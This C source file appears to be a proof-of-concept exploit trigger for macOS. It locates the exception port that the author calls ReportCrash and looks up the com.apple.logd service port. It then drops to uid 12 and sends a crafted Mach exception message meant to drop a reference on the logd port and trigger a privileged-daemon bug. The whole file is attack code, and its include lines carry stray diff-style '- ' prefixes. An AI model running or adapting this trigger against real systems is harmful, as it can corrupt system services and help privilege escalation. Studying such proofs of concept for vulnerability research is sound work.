- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <servers/bootstrap.h>
- #include <mach/mach.h>
- #include <mach/task.h>
- #include "mach_exc.h"
- #include <mach/exception_types.h>
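/*
 * Send a single exception-raise-state-identity message to report_crash_port.
 *
 * target_port is placed in the message's "thread" slot; the "task" slot is
 * MACH_PORT_NULL and the exception type, code list and thread state are all
 * empty (exception 0, codeCnt 0, old_stateCnt 0).  Nothing from the reply is
 * used apart from its status code.  What the receiver does with such a
 * message is not visible in this file; the function name is the author's.
 *
 * report_crash_port: exception port the message is delivered to (the caller
 *                    selects it, see main()).
 * target_port:       port sent in the "thread" field of the message.
 *
 * The MIG call's kern_return_t used to be assigned and never read; it is now
 * printed so a rejected or failed send shows up in the program output.
 */
void drop_ref(mach_port_t report_crash_port, mach_port_t target_port) {
    int flavor = 0;
    mach_msg_type_number_t new_stateCnt = 0;

    kern_return_t err = mach_exception_raise_state_identity(
        report_crash_port,   /* exception_port */
        target_port,         /* thread */
        MACH_PORT_NULL,      /* task */
        0,                   /* exception */
        0,                   /* code (no code list) */
        0,                   /* codeCnt */
        &flavor,             /* flavor, in/out */
        NULL,                /* old_state */
        0,                   /* old_stateCnt */
        NULL,                /* new_state */
        &new_stateCnt);      /* new_stateCnt, out */

    /* kern_return_t is an int; print it as hex like the other port values. */
    printf("mach_exception_raise_state_identity returned 0x%x\n", (unsigned)err);
}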
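/*
 * Entry point.  Must be run as root.  Steps, in order:
 *   1. read the host exception ports and remember the one whose mask covers
 *      EXC_RESOURCE (the author refers to it as the ReportCrash port);
 *   2. look up the "com.apple.logd" service through the bootstrap port;
 *   3. drop to uid 12 (the author's comment calls it "everyone");
 *   4. hand both ports to drop_ref().
 *
 * Returns EXIT_SUCCESS once drop_ref() has been called, EXIT_FAILURE when
 * any preparatory step fails.  Every failure path used to return 0, which
 * made a failed run indistinguishable from a completed one for a caller
 * checking the exit status.
 */
int main(void) {
    if (getuid() != 0) {
        printf("this PoC should be run as root\n");
        return EXIT_FAILURE;
    }

    // take a look at our exception ports:
    exception_mask_t masks[EXC_TYPES_COUNT] = {0};
    mach_msg_type_number_t count = EXC_TYPES_COUNT;
    mach_port_t ports[EXC_TYPES_COUNT] = {0};
    exception_behavior_t behaviors[EXC_TYPES_COUNT] = {0};
    thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {0};

    /* mach_host_self() hands back a send right; release it after the query. */
    mach_port_t host = mach_host_self();
    /* The author's alternative query, left for reference:
     *   task_get_exception_ports(mach_task_self(), EXC_MASK_ALL, ...) */
    kern_return_t err = host_get_exception_ports(host,
                                                 EXC_MASK_ALL,
                                                 masks,
                                                 &count,
                                                 ports,
                                                 behaviors,
                                                 flavors);
    (void)mach_port_deallocate(mach_task_self(), host);
    if (err != KERN_SUCCESS) {
        printf("failed to get the exception ports\n");
        return EXIT_FAILURE;
    }
    /* count is in/out and should not exceed the array size; clamp defensively. */
    if (count > EXC_TYPES_COUNT) {
        count = EXC_TYPES_COUNT;
    }
    /* mach_msg_type_number_t is unsigned: %u, not %d. */
    printf("count: %u\n", count);

    mach_port_t report_crash_port = MACH_PORT_NULL;
    for (mach_msg_type_number_t i = 0; i < count; i++) {
        printf("port: %x %08x\n", ports[i], masks[i]);
        /* EXC_MASK_RESOURCE is the named form of (1 << EXC_RESOURCE). */
        if (masks[i] & EXC_MASK_RESOURCE) {
            report_crash_port = ports[i];
        }
    }
    if (report_crash_port == MACH_PORT_NULL) {
        printf("couldn't find ReportCrash port\n");
        return EXIT_FAILURE;
    }
    printf("report crash port: 0x%x\n", report_crash_port);

    // the port we will target:
    mach_port_t bs = MACH_PORT_NULL;
    /* The return value was previously ignored; a missing bootstrap port would
     * only have surfaced as a failed look-up below. */
    err = task_get_bootstrap_port(mach_task_self(), &bs);
    if (err != KERN_SUCCESS || bs == MACH_PORT_NULL) {
        printf("unable to get the bootstrap port\n");
        return EXIT_FAILURE;
    }
    printf("targeting bootstrap port: %x\n", bs);

    mach_port_t service_port = MACH_PORT_NULL;
    err = bootstrap_look_up(bs, "com.apple.logd", &service_port);
    if (err != KERN_SUCCESS) {
        printf("unable to look up target service\n");
        return EXIT_FAILURE;
    }
    printf("got service: 0x%x\n", service_port);

    // triggering the bug requires that we send from a different uid
    // drop to everyone(12)
    const uid_t everyone_uid = 12;
    if (setuid(everyone_uid) != 0) {
        printf("setuid failed...\n");
        return EXIT_FAILURE;
    }
    printf("dropped to uid 12\n");

    /* Only the status of the send itself is reported by drop_ref(). */
    drop_ref(report_crash_port, service_port);
    return EXIT_SUCCESS;
}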